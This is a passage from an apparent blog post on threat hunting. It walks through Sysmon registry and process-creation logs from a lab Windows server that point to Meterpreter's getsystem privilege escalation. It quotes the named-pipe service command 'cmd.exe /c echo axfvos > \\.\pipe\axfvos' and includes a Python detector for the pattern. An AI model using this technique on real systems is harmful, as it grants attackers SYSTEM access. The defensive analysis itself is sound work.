a bit later we have a Registry value set event related to creation of a new service:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; 
text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>13</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Registry value set (rule: RegistryEvent)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span 
class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Registry value set:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: T1031,T1050</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: 
normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">EventType: SetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">UtcTime: 2020-07-19 20:04:17.209</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\system32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\Start</font></span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Details: DWORD (0x00000003)</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Followed by another related Registry value set event:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; 
orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>13</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Registry value set (rule: RegistryEvent)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Registry value set:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: T1031,T1050</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">EventType: SetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:17.209</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\system32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetObject: 
HKLM\System\CurrentControlSet\Services\axfvos\ImagePath</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Details: cmd.exe /c echo axfvos > \\.\pipe\axfvos</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And a blink later, a related process creation event:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; 
font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: 
normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); 
font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:17.225</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a741-5f14-920b-440000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 1720</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\System32\cmd.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 6.2.9200.16384 (win8_rtm.120725-1247)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;">Description: Windows Command Processor</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: Cmd.Exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: cmd.exe /c echo axfvos > \\.\pipe\axfvos</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Windows\system32\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: 
normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: NT AUTHORITY\SYSTEM</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-bb4e-5f13-e703-000000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3E7</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 0</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: 
MD5=BF93A2F9901E9B3DFCA8A7982F4A9868,SHA256=858A5766A2DE54A6908A2CA30DD5983790B8C63614A455292613B129877223E9,IMPHASH=B16908B0B9C28132BF70555413F2F045</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\System32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: C:\Windows\system32\services.exe</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 
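0px;"></div><div>
Added example, not code from the post: a small Python correlator that ties the events shown above into one finding, namely the Event ID 13 write of a named-pipe command into a service's ImagePath, the Event ID 1 cmd.exe child of services.exe running that same command line, and the Start value writes for the same service. The sample records are constructed dicts mirroring the post's Sysmon fields; the regexes, the five-second window and all function names are assumptions of mine.
</div>

```python
"""Correlate Sysmon Event ID 13 / Event ID 1 records into one finding for the
service-with-named-pipe pattern. Added example; not code from the post."""
import re
from datetime import datetime, timedelta

# Constructed sample records (dicts mirroring the post's Sysmon message fields).
# Service name, paths, PIDs and timestamps are copied from the post's excerpts;
# the final Spooler record is a made-up benign service write for contrast.
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2020-07-19 20:04:17.209", "ProcessId": 468,
     "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\axfvos\Start",
     "Details": "DWORD (0x00000003)"},
    {"EventID": 13, "UtcTime": "2020-07-19 20:04:17.209", "ProcessId": 468,
     "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\axfvos\ImagePath",
     "Details": r"cmd.exe /c echo axfvos > \\.\pipe\axfvos"},
    {"EventID": 1, "UtcTime": "2020-07-19 20:04:17.225", "ProcessId": 1720,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo axfvos > \\.\pipe\axfvos",
     "User": r"NT AUTHORITY\SYSTEM", "ParentProcessId": 468,
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 13, "UtcTime": "2020-07-19 20:04:17.225", "ProcessId": 468,
     "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\axfvos\Start",
     "Details": "DWORD (0x00000004)"},
    {"EventID": 13, "UtcTime": "2020-07-19 20:05:00.000", "ProcessId": 468,
     "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath",
     "Details": r"C:\Windows\System32\spoolsv.exe"},
]

# Assumed patterns: a Start/ImagePath write under a CurrentControlSet service
# key, and a \\.\pipe\ reference inside the value that becomes the service binary.
SERVICE_VALUE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\(Start|ImagePath)$", re.I)
NAMED_PIPE = re.compile(r"\\\\\.\\pipe\\", re.I)
DWORD = re.compile(r"0x([0-9A-Fa-f]+)")


def parse_utc(text):
    """Sysmon UtcTime as written in the post, e.g. '2020-07-19 20:04:17.209'."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def dword_value(details):
    """'DWORD (0x00000003)' -> 3; None when the value is not a DWORD."""
    m = DWORD.search(details)
    return int(m.group(1), 16) if m else None


def find_pipe_service_findings(events, window=timedelta(seconds=5)):
    """One finding per ImagePath write that points a service at a named pipe,
    with the matching services.exe child process and Start writes attached."""
    findings = []
    for ev in events:
        key = SERVICE_VALUE.match(ev.get("TargetObject", "")) if ev["EventID"] == 13 else None
        if not key or key.group(2).lower() != "imagepath":
            continue
        image_path = ev["Details"]
        if not NAMED_PIPE.search(image_path):
            continue
        service, t0 = key.group(1), parse_utc(ev["UtcTime"])
        finding = {"service": service, "image_path": image_path,
                   "process_create": None, "start_values": []}
        for other in events:
            if abs(parse_utc(other["UtcTime"]) - t0) > window:
                continue
            if (other["EventID"] == 1
                    and other.get("ParentImage", "").lower().endswith("\\services.exe")
                    and other.get("CommandLine") == image_path):
                finding["process_create"] = other
            elif other["EventID"] == 13:
                k = SERVICE_VALUE.match(other.get("TargetObject", ""))
                if k and k.group(1).lower() == service.lower() and k.group(2).lower() == "start":
                    finding["start_values"].append(dword_value(other["Details"]))
        findings.append(finding)
    return findings


def classify(finding):
    """'high' when the whole sequence is present: pipe ImagePath, services.exe
    spawned it, and Start went 3 (manual/demand start) then 4 (disabled)."""
    if finding["process_create"] and finding["start_values"] == [3, 4]:
        return "high"
    return "medium" if finding["process_create"] else "low"


if __name__ == "__main__":
    for f in find_pipe_service_findings(SAMPLE_EVENTS):
        print(classify(f), f["service"], f["image_path"], f["start_values"])
```

<div style="-webkit-text-stroke-width: 0px; word-spacing: 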
0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">A little searching online and you'll find references indicating this is probably related to Meterpreter's </font><a href="https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/" target="_blank"><font face="courier">getsystem</font></a><font face="inherit"> command.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; 